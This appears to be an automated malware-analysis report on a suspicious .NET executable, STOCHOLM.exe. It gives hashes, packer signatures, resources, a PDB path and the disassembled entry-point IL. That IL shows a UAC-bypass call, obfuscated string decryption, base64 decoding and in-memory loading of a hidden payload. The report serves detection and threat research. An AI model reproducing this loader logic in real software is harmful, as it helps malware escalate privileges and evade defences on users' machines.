Suspicious
Suspect

2b74db9ac4b779aa0c90e105f6012511

PE Executable | MD5: 2b74db9ac4b779aa0c90e105f6012511 | Size: 900.1 KB | application/x-dosexec


Characteristics

Symbol Obfuscation Score: Low

Hash
MD5: 2b74db9ac4b779aa0c90e105f6012511
Sha1: 6487a11310f83a9131583c13267a12fffb756d39
Sha256: a33b3cb7c2f7f4f13c4b0503d403ac9584655ef92a07d2c88ed38cc1b15f3b51
Sha384: 9d9e83b59f79f235d6bb75a8b428f76c02f2bf1922fa649f6d2510cdc280dbf0a84a0bc35edc933e5ef9c78dbbf01d18
Sha512: 76a580759d7b4f8cd66bb0290fb0a47fd243914cea5fed4327efb95c3dead869af32671b3355eeb31961655b4cd270268137e131ee6008849813e02f05d8f72d
SSDeep: 12288:H75Gf8DzxhMU75Gf8DzxhMU2iND75Gf8DzxhMVySvgXOwI8J:H0f8DV90f8DVr1d0f8DVsCU8
TLSH: BE15890066B383D5C96D01FA85A6D6EC4E718DE27369C339D98AFE492D3225E130D3B7

PeID

.NET executable
MEW 11 SE 1.2
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.reloc
.rsrc
Resources
RT_ICON
ID:0002
ID:0
ID:0-preview.png
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0008
ID:0
ID:0009
ID:0
ID:000A
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
STOCHOLM.Form1.resources
pictureBox1.Image
[NBF]root.Data
[NBF]root.Data-preview.png
STOCHOLM.AboutBox1.resources
logoPictureBox.Image
[NBF]root.Data
[NBF]root.Data-preview.png
STOCHOLM.Properties.Resources.resources
Information
Info: PE Detect: PeReader OK (file layout)
Info: PDB Path: C:\Users\Administrator\documents\visual studio 2010\Projects\STOCHOLM\STOCHOLM\obj\x86\Release\STOCHOLM.pdb
Module Name: STOCHOLM.exe
Full Name: STOCHOLM.exe
EntryPoint: System.Void WindowsFormsApplication1.Program::Main()
Scope Name: STOCHOLM.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v2.0.50727
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: STOCHOLM
Assembly Version: 18.5.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 55
Main Method: System.Void WindowsFormsApplication1.Program::Main()
Main IL Instruction Count: 104

Main IL

br IL_000D: nop
br IL_0013: ldc.i4 1
conv.ovf.i1.un <null>
conv.i1 <null>
div <null>
nop <null>
br IL_0005: br IL_0013
ldc.i4 1
ldc.i4 2047593740
ldc.i4 1305845588
ldc.i4 632579234
call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32)
ldloca V_0
newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&)
stloc V_6
ldloc V_0
brtrue IL_0047: call System.Void WindowsFormsApplication1.UACBypass::Execute()
leave IL_01B8: ret
call System.Void WindowsFormsApplication1.UACBypass::Execute()
call System.Void WindowsFormsApplication1.CoreManager::InitializeShield()
call System.Void WindowsFormsApplication1.CoreManager::CheckLongevity()
ldc.i4 60000
call System.Void WindowsFormsApplication1.Program::S(System.UInt32)
ldc.i4 1244124813
ldc.i4 1305766580
ldc.i4 632656356
call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32)
stloc V_1
ldloc V_1
call System.Boolean System.String::IsNullOrEmpty(System.String)
brfalse IL_008B: ldloc V_1
leave IL_01B8: ret
ldloc V_1
ldc.i4 2114407108
ldc.i4 1305766582
ldc.i4 632579206
call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32)
ldc.i4 1432588284
ldc.i4 1305766582
ldc.i4 632579204
call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32)
callvirt System.String System.String::Replace(System.String,System.String)
ldc.i4 1366866314
ldc.i4 1305766576
ldc.i4 632579206
call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32)
ldc.i4 1685068557
ldc.i4 1305766576
ldc.i4 632579204
call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32)
callvirt System.String System.String::Replace(System.String,System.String)
ldc.i4 818148685
ldc.i4 1305766578
ldc.i4 632579206
call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32)
ldc.i4 214370645
ldc.i4 1305766578
ldc.i4 632579204
call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32)
callvirt System.String System.String::Replace(System.String,System.String)
call System.Byte[] System.Convert::FromBase64String(System.String)
stloc V_2
ldc.i4 1132450136
ldc.i4 1305766594
ldc.i4 632579220
call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32)
call System.String WindowsFormsApplication1.Program::D(System.String)
stloc V_3
ldc.i4 309885496
ldc.i4 1305766626
ldc.i4 632579236
call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32)
call System.String WindowsFormsApplication1.Program::D(System.String)
stloc V_4
ldc.i4 1780730267
ldc.i4 1305766642
ldc.i4 632579220
call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32)
call System.String WindowsFormsApplication1.Program::D(System.String)
stloc V_5
call System.AppDomain System.AppDomain::get_CurrentDomain()
ldloc V_3
ldc.i4 1
ldloc V_2
ldloc V_4
ldloc V_5
call System.Void WindowsFormsApplication1.Program::cell(System.AppDomain,System.String,Microsoft.VisualBasic.CallType,System.Byte[],System.String,System.String)
leave IL_01A0: leave IL_01B8
pop <null>
leave IL_01A0: leave IL_01B8
leave IL_01B8: ret
ldloc V_6
brfalse IL_01B7: endfinally
ldloc V_6
callvirt System.Void System.IDisposable::Dispose()
endfinally <null>
ret <null>
br IL_01BE: nop
nop <null>
br IL_01C6: br IL_0013
not <null>
add.ovf <null>
br IL_0013: ldc.i4 1
ret <null>
